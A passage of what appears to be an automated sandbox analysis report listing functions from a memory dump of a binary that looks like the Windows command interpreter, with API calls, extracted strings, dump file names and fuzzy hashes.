                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3510147486-2605508654
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 277a1ac477c7a5775c333b697b491c3f29c8014ee36902232a64355ce24a0823
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0611872608B8B8AEB619F21D8443E9B7A4FB45B85FD44136DA0E4B768DFBCD244C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15172B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,00000000,00000000,00007FF7D1517279,?,?,?,?,?,00007FF7D151BFA9), ref: 00007FF7D1534485
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: longjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1832741078-366822981
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 322c5cfc7085a76491137e66a5cd7dbef5c550a58f217e12f15cbc0909c32713
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3C17E60E0C64B81F725BB1A55856BCA791AB56B84FE14037DD0F536B2CFBCE8868360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D1526677
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D152668F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _errno.MSVCRT ref: 00007FF7D15266A3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF7D15266C4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D15266E4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D15266FE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2348642995-441775793
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fb79f6ddb9e74c17efb699e0fa1162a98c71d9a5d01a277147ec5e32a658f81b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19715C67908A5BC5F7606F21E45017DF7A0EB55B84FD88077DA4F862A4EFBCA484C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15186B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3223794493-3086019870
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 75b9d129e47d1759fc79ab3cbc8313769d05a4843cc5bd683531d238640ba622
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6517B25A08A4B8AFB55AB15A41017DBBA0EB49B50FD89576CA5F433B0DFBCE085C730
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15386FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s$/-.$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1644023181-879152773
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4dd2a969bb7c23e063f632605d00564cb883c8619fe93ded7d1f8bf6df6454f3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7691B022B0864B81FB59ABA0D4502BEE2A1EF80B90FD44677D94F436B4DEBCE545C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1537251), ref: 00007FF7D153628E
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: wil
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 24740636-1589926490
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d9dbaaaab8527c625183ccb233f0d383893d9d5630bb39c58e596b3bffe177d2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA416021A0854B87F3606B11E40027DE6A1EF86781FE08136E90B47AF4CFBDE9498721
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1517AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1397130798-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 81bf41be8927f32f62ab646909b5bc0e1bc91de2b17cbe436688ccae12414a0f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 724f7ca6de1d2199ac7a1f6292729104aec5d7855033ff602e4af0a6132ac251
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81bf41be8927f32f62ab646909b5bc0e1bc91de2b17cbe436688ccae12414a0f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4891A522B0868B96FB65AB10D4406BDF3A1FB84B84FC58076DA4F437A4DFBDD5818720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D15225CA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D15225E8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D152260F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D1522636
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D1522650
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3407644289-1668778490
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 827fe39f1c827591467e2895404ed0c53e3c9c8069902dc6501238c6b755d561
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0313A27A1851B85FB617F21E81537DA694AF85B80FE48077DA0F862B5DEBCE400C731
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1527E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT ref: 00007FF7D1527EEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3731854180-3554254475
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c25690b87a8360884804bcb8229e23bcc020eb00867746f7a7ec783d5e755514
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75A16C22A0968B85F760AF51A85027DF6A0FB59790FD08136DA5F877B4DFBCE441CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
